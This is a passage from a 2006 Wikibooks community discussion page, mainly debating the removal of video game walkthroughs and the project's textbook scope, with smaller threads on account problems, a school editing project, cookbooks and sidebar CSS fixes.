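Viewing Language/Lesson 1 then shows the lesson heading and notes (and applies the category), but not the noinclude'd note; to pull in only one section rather than the whole page, you would still need a conditional trick like the switch/hiddenStructure div mentioned above.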
weird glitch
Don't know where to go to report this. It's happening on Wikibooks and Wikipedia. When I go to log in, the entire user options bar jumps sideways. In fact it tends to do this whenever I put my cursor over the general area??????? -perplexing- Prometheuspan 02:39, 22 April 2006 (UTC)
Prometheuspan My talk Preferences My watchlist My contributions Log out
keeps hopping to the left side of the screen.
Wikibooks is not a depository for video game manuals
This is an instruction that Jimbo has added to Wikibooks:What is Wikibooks [1]. He has also noted this on Wikibooks talk:Computer and video games bookshelf, where he has made it clear that, although time would be allowed for the video game manuals we have to be moved elsewhere, that they really do not belong on Wikibooks. It also seems that his thinking is that Wikibooks's scope really should be textbooks for educational reasons.
Because of the terms of WMF's educational mission charter, it seems that we have no choice on this. Personally, I must say that (even ignoring WMF's educational mission charter) I would agree with Jimmy - Wikibooks should be for textbooks, which to my mind means books that encourage or aid learning (for school, university, professionals or for the kind of subjects you see in adult learning courses, such as cookery or flower arranging, or what have you). Video game walkthroughs quite simply do not belong.
I think we should agree a cut-off date after which video games walkthroughs will be deleted - a generous one, perhaps the end of July, say. This would give plenty of time to allow them to find a new home, whilst also making it clear that they will be removed. In isolated cases, for exceptional reasons, any deadline chosen could be extended - but the message would be that we are serious about removing them, please move your work elsewhere (could wikicities help?), you have plenty of time to do this, but do move them or your work will be lost.
In the meantime, I propose that any new video game walkthroughs that are started are speedy deletion candidates, with a requirement that a note be placed on the author's page explaining our new approach. Discussion of this proposal can be on Wikibooks:Deletion policy, Jguk 06:03, 22 April 2006 (UTC)
- Finally! That's good news. While I'm impressed by the depth and quality of the guides we've amassed, as textbooks they all fall flat. But this is going to be a big effort. There are many things to do now. I wonder though, what's the best way to transwiki? I assume a database dump could be downloaded and then installed on the new host server, or is cut-'n'-paste with a history list still the best way? If a database import isn't viable I can get onto contacting authors and transwikiing content right away. I suggest that rather than expect the authors to find their own hosts that they all be moved to StrategyWiki. From there the authors can contribute or fork off to their own server as they please, and it would mean Wikibooks could be emptied by the due-date without worrying over books that didn't get dealt with in time. In closing, yay! :) GarrettTalk 08:42, 22 April 2006 (UTC)
A number of points regarding your suggestion (which on the whole seems like a great solution):
- Is the licensing of submissions to StrategyWiki compatible with the licensing used for submissions to Wikibooks?
- Assuming the answer is yes, would StrategyWiki accept the material? (we could easily ask them that)
- We'd then need to agree with StrategyWiki how to transfer material (assuming we've dealt with 1 and 2 this should be possible, but I wouldn't want to introduce lots of material to StrategyWiki en masse in a way that disrupts what they're doing).
- Presumably once transwiki'ed (however that is achieved) we can delete each book here straightaway - though we probably ought to offer a link from the title page of each book to the StrategyWiki page for a period (a year say) so that anyone looking for it here can find it on StrategyWiki.
Finally, I have never seen StrategyWiki before. Visually it looks excellent, much better than what we've got here at Wikibooks. And it all seems to be on MediaWiki. I'm jealous. How do we get the appearance of Wikibooks to look equally excellent? Jguk 09:18, 22 April 2006 (UTC)
- Both are GFDL, so it's all go in that respect. :)
- In the past they've expressed an interest in receiving WB content (and also began copying over the ever-popular Grand Theft Auto: San Andreas guide). I've mentioned this policy change over there so they can reaffirm their opinions.
- As long as each book conforms to the subpage structure it shouldn't be too hard to manage.
- Sounds like a good plan, as there are bound to be some incoming links for a while yet (especially from fansites and outdated WP mirrors)
- As for the visual theme, you just need time and artistic talent. :) MediaWiki skins are merely CSS stylesheets, and adding new ones is basically drag-'n'-drop. Another good example of an unrecognisable MediaWiki install is the Elder Scrolls Construction Set Wiki. GarrettTalk 10:54, 22 April 2006 (UTC)
Where do you drop them into? Also, what do you need to design them? Jguk 17:30, 22 April 2006 (UTC)
- Anyone with access to the server can dump them into the skins folder (and also has to add a line or two to a PHP file, I think). If you were to replace an existing skin, however, this can all be done from the MediaWiki: namespace. All you need to design them is CSS knowledge, no special tools really. GarrettTalk 21:50, 22 April 2006 (UTC)
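As a low-effort starting point, many cosmetic changes need no server access at all: admins can edit the wiki page MediaWiki:Monobook.css, which is loaded site-wide on top of the default Monobook skin. A small illustrative sketch follows; the selectors are standard Monobook ones, while the colours and the logo path are placeholders, not anything this wiki actually uses:

```css
/* Site-wide overrides placed on the wiki page MediaWiki:Monobook.css */
#content {
    background: #fbfbf3;      /* placeholder page background colour */
    border-color: #c9b8a2;
}
.firstHeading {
    font-family: Georgia, "Times New Roman", serif;  /* restyle page titles */
}
/* Swapping the logo (image path here is hypothetical) */
#p-logo a {
    background-image: url(/images/custom-logo.png) !important;
}
```

A full custom skin still needs the server-side route described above, but stylesheet overrides like these are enough to make an install look noticeably different.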
So what about the other game manuals?
What about the Go, Chess and other game manuals on this site? Aka the Wikibooks:Games_bookshelf? Video games may have a "bad rep" in the press, for I dunno whatever reason. :-/ But if this is going to be done, we need total consistency. Nonetheless, it will be difficult for me to hang around this site if the game manuals are gone. It is no offense to Jimbo's decision, nor should this be taken as an act of resistance. His decision is his decision. At this point, no amount of disagreement can change the fate of these books.
Well, anyway. If normal games are to stay but if video games are removed... then this motion may have a little resistance. Convincing everyone that video games are not allowed while normal games are allowed is too difficult.
Other issues I see is convincing the Wikipedia community that Video Games are no longer allowed on this site. Somehow, that must be arranged (as far as why video games are allowed on wikipedia, but not wikibooks... but thats another story). --Dragontamer 17:56, 22 April 2006 (UTC)
- Thus I removed the new policy.
- We need to have "wide acceptance among editors" (perhaps excluding editors of things that do not belong at Wikibooks) before we can change WB:WIW, especially because the current version of WB:WIW does allow game manuals such as Go, Football (Soccer), and MapleStory, because they are "instructional resources". We might still be able to remove B:CVG guides (and maybe some others), but we need to discuss it first. --Kernigh 21:31, 22 April 2006 (UTC)
- Video game guides are to be removed (Jimbo capitalized "must" after all). That's been decided on and no amount of discussion by us will change the foundation's decision, so I don't see why you have removed the policy. Now the difficult question to answer is how far we go from there. Is the Wikibooks Pokédex, whose sole justification for keeping is that if game guides are accepted, it should be too, to be deleted? But regardless, video game guides are gone. --Hagindaz 23:31, 22 April 2006 (UTC)
Jimbo's expressed his thoughts in more detail in this textbook-l posting. GarrettTalk 21:50, 22 April 2006 (UTC)
In reply to Hagindaz, even if we are sure that we will remove video game guides, that does not mean that we are sure about the policy. Instead of banning all video game guides immediately, maybe we should take transitional steps. --Kernigh 02:09, 23 April 2006 (UTC)
- Well of course. That's obvious and exactly what Jimbo recommended. But a policy against the creation of new guides should be in place if indeed "we are sure that we will remove video game guides," though the existing guides should be kept as long as needed. --Hagindaz 02:37, 23 April 2006 (UTC)
Hey, say, what happened to my earlier comments? They just up and vanished and I can't even find them in the history?
My points were pretty good ones i thought.
Let's see. Re-construct.
Yes, I agree it is a big change, seemingly. However, the definition of the place is "textbooks." Reading below I get more information, which is nice. Apparently that wasn't the initial total intention of the conceptual inventor of Wikibooks.
However, my earlier point, that how to play video games doesn't really match the mission statement here, is still true for really the same reasons. If, at long-term expansion, 20 years from now the library were well founded, large and complete, the operational functional umbrella would expand that large. The problem is that Wikibooks is barely meeting the mission statement, and that bookshelf is getting crowded. Where's the textbook on how to write a video game? Or on how to think in three-dimensional coding? Or how to program a 3-dimensional model? Those are the kinds of books we need, and without them, the problem is that Wikibooks ends up being a kiddie zone.
(This isn't a reconstruction, I have new information... drat.)
But still, the same point is essentially true. People come here in good faith and see an opportunity to write something. But maybe over the long term they fail to make it neutral, or it's too POV, or it's fiction, etc. If it meets some realistic criteria, we ought to keep it but shelve it on a shelf that is useful. There are probably dozens of books on Wikibooks that wouldn't make the cut as "textbook." We don't need to delete them, and it might even be true that we don't need to move them. But they do need to exist in a place that is organized for them, and to fit into a macro which implies a library, not a game museum.
There are several books we should keep that are POV-encumbered. I can think of two examples off the top of my head. The "Asperger Survival Guide" and the "Universal Religion" texts. The first is POV as it's written by a magickal-thinking Asperger syndrome person. The funny thing is, it is exactly the kind of reference material a pro would die for in order to both help Asperger syndrome folks and to generate an annotated study of Asperger-type thinking. POV in this case means GOLD MINE. "Universal Religion" was a good faith attempt but a half lucid follow through. Its POV biases are train wreck accidents and the author isn't really a POV pusher by a long shot. I'd devote a week to showing how the starting premise is a good one and show how it could be a valuable NPOV text if it went up for deletion, because it's a "halfway there" sort of book that really just needs a fresh batch of neutrality-ification authors. Prometheuspan 21:04, 24 April 2006 (UTC)
Fiat decisions and the scope of Wikibooks
There are two very different visions that I see regarding Wikibooks, from two very different people as well. One is from the "founder" of Wikibooks, Karl Wick. I can't speak for him directly, but in many various places he has expressed a much more inclusive attitude toward what can appear in Wikibooks. For myself, I feel that if you have a subject that is in Wikipedia, but it can be covered in much more depth and detail than a typical 32K article, it can become a Wikibook. That removes the original research problems and would largely fit with what is currently in the WB:WIN list except for specific changes that Jimbo has added in the past six months or so. In summation, Wikibooks is for books and major content that takes quite a bit of work to organize.
That is a great idea, and the broadness of the scope is a better umbrella. I think that "Fiction" and "POV" bookshelves are really the best solution overall, but think of this in a social systems theory perspective, like Jimbo. It's not that we don't love a bunch of games, but we need to narrow the focus of our filter in order to generate the minimum bare bones product. Most of the books on Wikibooks are not only unfinished, they sort of look like maybe a batch of teenagers started the project and then promptly abandoned it. This is a systemic problem, and limitation of scope is one way of resolving that systemic problem as an information systems engineer. Prometheuspan 21:04, 24 April 2006 (UTC)
The other school of thought is that Wikibooks is strictly for textbooks alone and nothing else. That would mean that even books like Serial Programming, which might be taught as a college subject but isn't very well cited or organized along formal textbook lines with sample problems and student exercises, would not qualify. In short, that would disqualify just about everything here on Wikibooks. Or even more strict, if I can interpret what Jimbo seems to be saying about the content here, if it can't be found at a college bookstore then it shouldn't be here.
- Serial Programming is at least a topic proper for a textbook, and the fact that it is not yet a very good textbook is of course no grounds for deletion, but rather grounds for radical improvement. I am certainly not saying "if it can't be found at a college bookstore then it shouldn't be here". We are interested in creating a complete curriculum for Kindergarten through the University level. The proper question is: is this a textbook for a course taught in some accredited institution? --Jimbo Wales 13:34, 8 May 2006 (UTC)
Prometheuspan 21:04, 24 April 2006 (UTC) I really don't like that as a school of thought, and I hope that isn't what Jimbo is actually saying. I think that it might be a sort of accidental hyperbole of the other school of thought; this is my interpretation of the other school of thought. Wikibooks needs to focus on making it as a library in order to attract cyclically the kind of people who will improve it as a library. If Wikibooks becomes by means of content something other than a library, it will fail in the end as a useful information resource. The idea here isn't to absolutely exclude what isn't a textbook, it is to focus all current efforts on what Wikibooks has to do in order to ensure its viability as an information service.
I believe this to be way overly restrictive, and it can't really be used to judge any content that would fall under even some moderation between these two schools of thought.
Prometheuspan 21:04, 24 April 2006 (UTC) If that were the actual other side, I would agree, it does seem overly restrictive. If it were even as much as a permanent rule, rather than an information service engineering tactic, I'd see it as a self-debilitating limitation for any information service labeling itself a library. I hope that my interpretation of the other point of view is closer to it than your interpretation of it, because I think therein lie the compromises we are looking for.
More to the point, if this is something that has been gnawing at Jimbo's mind for some time (as apparently it has), I wish he would come out and say it. If he were still paying for these servers completely out of his own pocket, I might be willing to say that he has the authority to do this huge policy shift, but he isn't and IMHO doesn't. I guess we can't overcome a forced Wikimedia Foundation Board policy decision on this matter, but then again I think such a heavy handed approach is going to be something that will be highly detrimental to this project. And some of the current board members, notably Anthere, feel we are being way too restrictive on the content already with Wikibooks. If we were restrictive before, you have only just seen this get started.
- As far as I am aware, Anthere and I are in complete agreement about what should be in Wikibooks.--Jimbo Wales 13:34, 8 May 2006 (UTC)
- If you and Anthere were in agreement, there wouldn't have been a fight over the Wikimania proceedings being placed on Wikibooks, nor would it have even been put on Wikibooks in the first place. Generally speaking the attitude in the past by many users, including both Anthere and Angela, was to be inclusive for the most part as long as it was kept within GFDL guidelines and was generally speaking book content. --Rob Horning 23:42, 8 May 2006 (UTC)
Mind you, as I've pointed out numerous times and in numerous places, less than 1/2 of all Wikibooks content is even in English. If such a fiat decision is going to be made, it will also have to be enforced not only on en.wikibooks but on all Wikibooks projects. IMHO such a major policy change (and there are video game guides for the other language Wikibooks) should involve more than even this one project as well. I'll admit that the other language Wikibooks usually use en.wikibooks as a "template" to see what some general policies ought to be, but there already are some interesting differences in general policies between the various languages. I'm sure Derbeth could give some examples between pl.wikibooks and en.wikibooks, and pt.wikibooks (a language I speak) has a policy that excludes controversial religious books that we allow on en.wikibooks.
- There have been no fiat decisions here! I have merely pointed out that we have always had policy, and the policy has not been well-enforced in the past. Wikibooks has been the victim of some well-meaning wikipedians sending junk over here. Do not allow yourselves to become a dumping ground.--Jimbo Wales 13:34, 8 May 2006 (UTC)
- You had better believe this is a fiat decision. You went to WB:WIW and deliberately made a specific policy change to exclude over 100 different Wikibooks. Some of these have been started here on Wikibooks during this time when we have had a full bookshelf (a Wikibooks organizational division) created just for this content. It wasn't as though this was something that was added without Wikibooks users knowing about it unlike the Wikimania proceedings. While I have been one who has complained about Wikipedia dumping content on Wikibooks, this was not it, and this has not been widespread policy until now. The debate over removing these books has been a lingering debate here, and it is my perception that one of those anti-video game guides proponents finally got you to side with them effectively ending the debate and giving rationale to act on a massive scale. Wikibooks has been diminished as a result of this effort, and will IMHO be permanently damaged due to this action. I still fail to see any rationale on your part Jimmy as to why this policy change was made other than you simply felt like making the change. Thousands of hours of honest work have been destroyed and a significant group of Wikibooks users alienated and have been told to leave because of this action. Vandals couldn't have been any worse in this regard. --Rob Horning 23:42, 8 May 2006 (UTC)
I welcome the debate over keeping or removing video game guides on Wikibooks, but this should be done through a legislative process and not through some executive order. And it should be a policy that gets input from all Wikibooks projects, not just en.wikibooks as well. I'm using the term legislative process as a way to say we need community consensus on this issue, but it should be way more than a couple of people saying "Yeah, let's do it" with perhaps one lone person saying "er... it might not be so good of an idea".
My personal "political" stand on this issue is that video game guides should remain. I've added some key points in Wikibooks talk:Game manual guidelines#For (Wikibooks should include game guides) including specific university-level curriculum that is currently being taught about this topic, and classes that indeed do study Doom as a classroom topic. That is a seminal video game and is going to be studied 100 years from now because of how groundbreaking of a video game it was. Just as Birth of a Nation is studied in university classes as a seminal motion picture today. In addition, and policy that "makes sense" is going to have to be more inclusive or exclusive over content than simply video games, and is going to have to hit the core of What is Wikibooks to see if this really is just textbooks or if it is for other non-fiction works as well. And how we define the term textbook. --Rob Horning 01:22, 23 April 2006 (UTC)
- Rob, I think you misunderstand what Jimbo is doing. He is responsible, as head of the Wikimedia Foundation, for making sure that WMF resources are used in line with its charter, ie its educational mission. If he did not do that he would be neglecting his role and, ultimately, putting WMF's non-profit status in jeopardy. From time to time, this does need executive order. I also think he appreciates that in practice wikibooks has allowed video games walkthroughs for some time and therefore we should give them plenty of time to arrange their departure from wikibooks to what I hope is a welcome home that will allow them to continue to develop.
- I also think that what Jimbo is asking for is that we really do enforce the bit in WB:WIW that says "As a general rule, most books you might expect to find in the non-fiction section of your local library or bookshop are not acceptable because of the list of exclusions in this policy. This is for textbooks. A textbook is a book which is actually usable in an existing class." Do, however, give "existing class" a wide meaning as being in any accredited institution (ie don't restrict it to school). I'm sure that if you can show that a subject is studied in an existing class, and does have/need textbooks similar to a wikibook, that wikibook will remain, Jguk 06:25, 23 April 2006 (UTC)
- I am not misunderstanding this... or a huge misunderstanding perhaps. I do understand his role as "head of the Wikimedia Foundation", but its charter was written after the fact... and well after Wikibooks was established as a project and these video game guides were already on Wikibooks. This is not going to put the WMF's non-profit status in jeopardy in the least. This is a pure political move on the part of Jimbo to try and narrow the focus of Wikibooks, and he is using his position as chair of the WMF as justification to change policies here without even so much as having a discussion about this before the policy has been changed. That is just plain wrong to do with a project like this... even if he were contemplating such a policy change.
- I also fail to see where the motivation to remove an entire bookshelf of almost 100 different Wikibooks is coming from. If this were to remove one specific Wikibook that is perhaps a bit too much, such as he did with the Jokebook, perhaps I could agree or disagree, but it could also be dealt with through the VfD pages. And was. In this case he is making a huge policy shift in the project without consultation of any of the rest of the Wikibooks community and expecting us to try and divine his thoughts on why it was done... without any comment occurring that is of any substantial depth or justification, and instead relying on apologists to deal with the consequences.
- BTW, as far as video game development and study, I can point to existing university classes that not only give instruction on these topics, but go into depth and even grant degrees in video game design. And these are not two-bit pseudo colleges either, but otherwise widely respected major universities. The video game industry is now larger than the movie industry in terms of economic impact in the USA alone (it passed sales of movie tickets & video sales some time in 2004). Over time it is certainly going to have some colleges doing for it what the USC Film School does for the motion picture industry. The point here is that I fail to see why an entire bookshelf needs to be abandoned and all of the contents of all of the books deleted... especially on a decision that was not debated previously. --Rob Horning 12:29, 26 April 2006 (UTC)
- I agree with Rob here. Jimbo Wales needs to at least point out why this decision came out of the blue like this. Should we just sit still and silently get rid of 100+ books on this site without a discussion? Again, I point to Jimbo's edits. I have been watching this page in hope that he will give some sort of explanation of the issue. But just looking at his edit page, it makes me feel as if Jimbo isn't a participant in this community at all, a quality that should exist in an executive, don't you think?
- Heck, I thought as a community, we went over this already and settled that game guides *were* allowed on Wikibooks. And as such, we developed Wikibooks:Game_manual_guidelines. That page existed since early November, and the issue was discussed and I felt at least the issue was closed.
- If Jimbo had an issue with the game guides, why didn't he talk about it when that guideline was being made? Why is it now, when the issue has been closed for 5+ months, that Jimbo says no, and the community has already moved on? --Dragontamer 16:25, 29 April 2006 (UTC)
There's a difference between a strategy guide/walkthrough and a book that examines the aspects of game design in a game. Because video games are unique in that they combine several art forms, the latter can easily be done, and without having any elements of a how-to book/strategy guide. Studies on novels, for example, have been written that are longer than the book they are about, aren't simply plot summaries, and are used in literature and writing classes. I see this as being similar to the difference between Muggles' Guide to Harry Potter and a Wikibook on a classic or revolutionary book. "Muggles' Guide" simply lists characters and summarizes chapters. And, like most video games, Harry Potter isn't anything special in its language or themes, so you wouldn't be able to write a book for classroom use.
Unless I'm forgetting a huge chunk of books, the books currently being hosted on Wikibooks fall into three divisions:
- Books that are, by any sense of the word, textbooks
- About topics taught in classrooms
- Structured in a way that wouldn't make sense for an encyclopaedia on the subject
- No question on what to do with these, obviously
- Guides/how-to books
- Would for the most part never be part of a school curriculum (though there is a small grey area)
- Video game strategy guides/walkthroughs and a book of recipes fall into this category
- May be popular enough to form their own project. See m:Talk:Proposals_for_new_projects#Proposal:_WikiHowTo
- Related encyclopaedic content
- Books like Wikibooks Pokédex and Muggles' Guide to Harry Potter (and possibly Serial Programming in its current form)
- Only purpose would be to serve as appendices (which has been argued in the case of the Pokédex)
I think most of the disagreement is over how-to books, which are instructional resources, yet are not used in classrooms. Whether Jimbo Wales has the right to limit Wikibooks' scope to simply textbooks, despite significant support for the inclusion of all instructional resources, is something that I am very interested in knowing. Perhaps dividing Wikibooks into separate textbooks and how-to books projects would be the best course? --Hagindaz 04:24, 23 April 2006 (UTC)
- I think Jimbo's response to my queries on the mailing list (see [2]) is quite useful in this regard. Please read the email in full for the details.
I know I am a newbie aspie, but I do wish the humans would listen. I have said repeatedly that Wikibooks needs a "fiction" and "pov" Bookshelf. Honestly, this is the solution to most of this problem. Just let the users know they are getting into swampy stuff by putting it out in the backyard somewhere instead of featuring it. Prometheuspan 21:04, 24 April 2006 (UTC)
- The comments that you make regarding the school curriculum are too narrow. Jimbo notes "The key point is that there have to be some kind of courses offered by some kind of serious institution of learning." That does not mean it has to be on the school curriculum. Books supporting adult learning courses or professional courses are, of course, welcome. For instance, serious cookery classes for adults (or children) (and I mean for amateurs not professional chefs) use cookbooks in classes, and the cookbook is most welcome. This is significantly different from a video game walkthrough, where Jimbo says "My question would be whether or not there exist classes at accredited institutions on the subject which use something similar _as a textbook_." There are lots of types of "accredited institutions", and this is meant to be given a very wide meaning.
- In respect of the Pokédex, I have no idea whether Pokémon are now so big as to mean accredited institutions study it - in which case a serious study guide in line with an example syllabus would be within the allowed limits. If not, then we shouldn't have it. To my mind "How-tos" are largely micro-books and would be merging into a single how-to textbook on "life" (and I'm sure some sort of "general studies" or "citizenship" type classes cover much of this material anyway), Jguk 06:17, 23 April 2006 (UTC)
- So what about video games like W:America's Army and W:Marine Doom? And then W:Brain Age, which *really* blurs the line of this new policy?--Dragontamer 16:26, 23 April 2006 (UTC)
- That's wikipedia, not wikibooks. Wikipedia meets the educational mission of WMF by being an encyclopaedia, and it's reasonable to have articles on those games in an encyclopaedia. Wikibooks is for textbooks, the same or similar to textbooks used by learning institutions, Jguk 19:05, 23 April 2006 (UTC)
- As per my recommendation, I've copied this (thread of) discussion to the WB:WIW talk page. Go there for my response. --Dragontamer 15:42, 24 April 2006 (UTC)
Hey, like, you could in theory write an educational-style textbook using a game as a hyper reference. The book would have to be about how to program, etc., not the game as its primary subject, though. See the difference? Prometheuspan 21:04, 24 April 2006 (UTC)
Let's centralize this discussion in the WB:WIW talk page
It is getting confusing. It feels as if I'm saying the same thing here and on that page. This issue really hits the core of WB:WIW anyway, so we can leave the Staff Lounge for any other developments. Also, it helps if we all are on the same page on this discussion. (no pun intended)--Dragontamer 16:26, 23 April 2006 (UTC)
- To aid discussion (and no more) I have created the page Wikibooks:Books possibly in contravention with WIW as a first shot at what books may have to be moved (although I note straight off that I imagine some of these will remain). I have also consolidated Jimbo's comments on the matter at Wikibooks:Comments from the President of the Wikimedia Foundation, Jguk 21:31, 23 April 2006 (UTC)
Wikibooks: No personal attacks policy changed from "enforced" to "proposed" again!
Jguk archived the discussion of this item on the 24th then changed the policy from enforced to proposed again! See Archived discussion where for about 2 weeks no one demurred from the policy being enforced. Perhaps it was only after archiving the discussion that he spotted the change to "enforced" status. RobinH 08:23, 24 April 2006 (UTC)
Proposal to restore "enforced" status to Wikibooks: No personal attacks - why we need a limited constitution and enforcement apparatus
A vote was taken at Wikibooks: No personal attacks and 10 users voted. This is a high number by Wikibooks standards. 8 of the 10 voted for the policy to be enforced. Surely reopening the issue after a vote (and several months) cannot be reasonable. I propose that the policy should be restored to enforced status.
The fact that a vote has been overturned unilaterally in the manner described is a graphic demonstration of the need for a limited constitution in the form of enforced policies and an enforcement apparatus.
At Wikibooks:Policies and guidelines there are several proposed policies that require review. The most important of these is probably Wikibooks:Ad hoc administration committee so that enforced policies can be enforced. RobinH 10:38, 26 April 2006 (UTC)
Somethings happened to my account
I've not been on wikibooks for a while and I think that possibly my account has been disabled. I can't log in, and emailing for a new password doesn't seem to work either, so I've had to create this new account (note the capitalisation). The problem however is my admin privileges. I run a computer club here at my school and starting on Wednesday intend to get the kids to edit a new Wikijunior book of science experiments that can be done at home. The problem is that this school is on a huge shared network that regularly gets blocked from Wikipedia because of vandals from other schools. I need to be able to unblock the network so that my (lovely, well behaved) pupils can edit (and reblock when we have finished if necessary). I also need to be able to delete pages created in error (my pupils are only 11, I expect a lot of errors). Are there any stewards here? Can someone give me admin powers on this account or reactivate the password on my other account? Theresa Knott 10:03, 24 April 2006 (UTC)
- Hm. A while back it was decided to de-admin inactive sysops, but you don't seem to be on that list. Anyway it could be that removing your powers somehow glitched your whole account. I'm not sure about stewards, but I'm pretty sure bureaucrats can give sysop status too. In which case try Dysprosia or Derbeth. Hopefully they can fix whatever's wrong. GarrettTalk 12:18, 24 April 2006 (UTC)
- Thanks it is all sorted out now. It was the email confirmation thing that was causing the problem. Theresa knott 14:29, 25 April 2006 (UTC)
Wikibooks:Bulletin board updated
I am planning to add more longer texts, vaguely similar to Wikisource:News, to Wikibooks:Bulletin board. I have started with:
- Local CheckUser status in doubt
- Potential consensus to remove computer and video game guides
--Kernigh 02:52, 25 April 2006 (UTC)
- Great! Definitely a way for people to keep up to date at a glance without having to read the actual discussions themselves (which in these two cases are especially confusing). GarrettTalk 05:12, 25 April 2006 (UTC)
Cookbooks categorisation system
Hello,
Is there a staff lounge specifically for Cookbooks? I couldn't find one. (Like maybe, hmm, Cookbook:Kitchen? :))
I wanted to ask what the story is with cookbook categorisation. I've spent a fair bit of time at Commons and they're (necessarily) pretty strict about categorisation norms. I started 'fixing' a bunch of pages then realised it might not be appropriate. Are there guidelines anywhere?
How is Cookbook:Recipes (the index) kept up to date? Is there a way to see all the recipes, or is the best bet Special:Allpages?
Thanks, pfctdayelise 12:32, 26 April 2006 (UTC)
- ...Anyone? pfctdayelise 01:30, 28 April 2006 (UTC)
Try Talk:Cookbook. --Kernigh 04:13, 28 April 2006 (UTC)
Talk:Cookbook is the main cookbook discussion page. From there you can find a link to pages in the cookbook namespace or you could browse to Category:Recipes to see the recipes that have been tagged with {{recipe}} Kellen T 11:49, 30 April 2006 (UTC)
Requesting 'bot status to accounts
This is an FYI to all Wikibooks users that a recent change to the MediaWiki software, included in the latest round of updates, means the 'bot flag (for robot, or automated, accounts) can now be set locally without having to deal with stewards on meta. This is now an "additional" responsibility that can be performed by bureaucrats.
As usual, you should still use Wikibooks:Requests for adminship#Requests for bot status to let everybody know that you want the bot flag added to an account, but you no longer have to make the request on meta after the decision has been made, unless there aren't any active bureaucrats paying attention. --Rob Horning 12:43, 26 April 2006 (UTC)
School project
I'm just letting everyone know that some of my pupils will be working on some wikijunior pages with me over the next 5 weeks. You will recognise them because they all have (knott) in brackets after a nickname. If you have any problems with them please let me know. It would be nice if someone welcomed them, and edited some of their pages. Their spelling and grammar are likely to be in need of a little help, and their formatting will be terrible at first.
Also we only managed to create 3 accounts. We are using a proxy and we got a message saying that there have already been 6 accounts created. Is there a time limit on this? Can we create more accounts next week? Theresa knott 15:37, 26 April 2006 (UTC)
- It's possible, and probable, that your connection is going through one of the many proxies used in the UK for educational Internet providers, which might appear to Wikibooks et al. as having the same IP address, depending upon a number of factors. If this is the case, then it's quite plausible that the account creation limit from that apparent IP address has been hit. This should be reset within 24 hours or so. 86.133.210.53 20:09, 26 April 2006 (UTC)
- Normally I wouldn't suggest this, but an IP spoofer might be the way around this. GarrettTalk 20:38, 26 April 2006 (UTC)
Need more books
Excellent wiki you have here. I love the language section. The only thing this wikibook website needs is: books! I anticipated finding lots of public domain literature here. But alas, not a Shakespeare sonnet to be found. Perhaps that's in the works? 129.174.63.163 11:11, 27 April 2006 (UTC) Jess
- Ah, you're looking in the wrong place. Wikibooks is for textbooks. For public domain literature, you'll need to look at our sister site, Jguk 11:51, 27 April 2006 (UTC)
Votes for adoption?
Erik Moeller wrote on textbook-l:
- For projects which are deemed outside the scope, as an alternative to deletion, it might be a good idea to have "Votes for adoption" - books tagged in this form could continue to be developed for the time being, but people would be encouraged to find a different, free content wiki to host them. Once there is consensus about a new home, the Wikibooks version would be redirected there.
I now forward the idea. --Kernigh 05:17, 28 April 2006 (UTC)
- I have no problem for using wikibooks in that way for books which have previously in practice been allowed here, but which are now considered outside our scope, provided (1) there has been no final determination that they are now outside the scope; or (2) if, as with computer and video walkthroughs, there is general acceptance that they are now outside the scope, as long as an alternative location is actively being looked for (which is the case for the walkthroughs). I would not be in favour of Erik's proposal for new books, Jguk 06:18, 28 April 2006 (UTC)
Creating account does not work
When trying to create an account the picture wouldn't show up, blocking me from creating the account. In other wikis this is no problem. I use Firefox 1.5.0.1 with several extensions, which work perfectly well with other wikis. Java/JavaScript are on.
-- Hvezd 09:12, 2006-04-29 (UTC)
- Can you try again at Special:Userlogin? From my copy of (outdated) Firefox 1.0.6, I was able to see the image.
- Of course, check that you did not tell Firefox to block images from en.wikibooks.org. (Most of the images on this site are from upload.wikimedia.org, so you would still be able to see them.) Right-click the words-image and make sure "Block images from en.wikibooks.org" is not checked. --Kernigh 08:12, 1 May 2006 (UTC)
Thanks. I never blocked any file of any wiki-site. I created accounts in other wikis before without any problem, and I could create an account in wikibooks via IE. Firefox showed the picture file in other wikis, just not in wikibooks. Now, 3 days later, it works again. No idea why. -- Hvezd 12:45, 2006-05-02 (UTC)
Sidebar
I've been bold and tried to improve the sidebar. Unfortunately, for some reason I can't fathom, the two items under "search" appear out of kilter. The page that feeds into the sidebar is MediaWiki:Sidebar. If anyone can see what's wrong please let me know (the page is protected so only admins can edit it). Of course, if you have ideas for improvements yourself, let us know too:) Jguk 07:12, 1 May 2006 (UTC)
- This shows that m:Be bold should apply to "MediaWiki:" pages even though only administrators can edit those.
- The problem with "search" was that the text was centered. This is because both the "search" (By subject, Alphabetically) and "search" (text field, Go button, Search button) sections are
<div class="portlet" id="p-search">in the HTML. The stylesheet centers the second "search" section, and thus also the first. I believe that I fixed the problem by changing "search" to "books". --Kernigh 08:02, 1 May 2006 (UTC)
- ... maybe I should have set it to "textbooks" instead of "books" ... --Kernigh 02:49, 3 May 2006 (UTC)
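For illustration only (this is a hypothetical sketch, not the actual markup MediaWiki generates), the situation Kernigh describes, where a sidebar section named "search" collides with the built-in search portlet, looks roughly like this:

```html
<!-- Hypothetical: two portlets end up sharing the same id -->
<div class="portlet" id="p-search">
  <!-- the sidebar section named "search" (By subject, Alphabetically) -->
</div>
<div class="portlet" id="p-search">
  <!-- the real search box (text field, Go, Search buttons) -->
</div>

<!-- A skin stylesheet rule along the lines of:
       #p-search { text-align: center; }
     is meant only for the real search box, but since both divs carry
     the same id it styles both, centering the link section too. -->
```

Renaming the first sidebar section (to "books", as Kernigh did) gives it a different generated id, so the search-box rule no longer matches it. HTML ids are supposed to be unique within a page, which is why the collision produces this kind of odd styling.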
BDSM on Wikibooks:Votes for undeletion
Since the Wikibooks:Votes for undeletion page is rarely used, this is to notify everyone that I have listed a module there. --Kernigh 06:30, 3 May 2006 (UTC)
Preparing for an Employment Interview
I would like to rename this book to something that is more concise, and would be easier to find. I'm looking for suggestions now, because I would like to start doing some major work on this book, such as breaking it down into sub pages, and working on the formatting etc. I don't want to make a bunch of subpages now, and then have to go back and rename all of them when we think of a better name. I would certainly appreciate any suggestions that anybody has on this matter. --Whiteknight (talk) (current) 19:10, 4 May 2006 (UTC)
- I agree that it's a bit of an awkward title, but I couldn't think of something nicer unless you want to roll it into a general-purpose "Interviewing" book. Kellen T 20:44, 4 May 2006 (UTC)
- True, but even then, it covers resume building and cover-letter writing. I was thinking something like "Get a Job", but i feel like that's too base. --Whiteknight (talk) (current) 21:23, 4 May 2006 (UTC)
Preparing for a job interview? Jguk 06:40, 5 May 2006 (UTC)
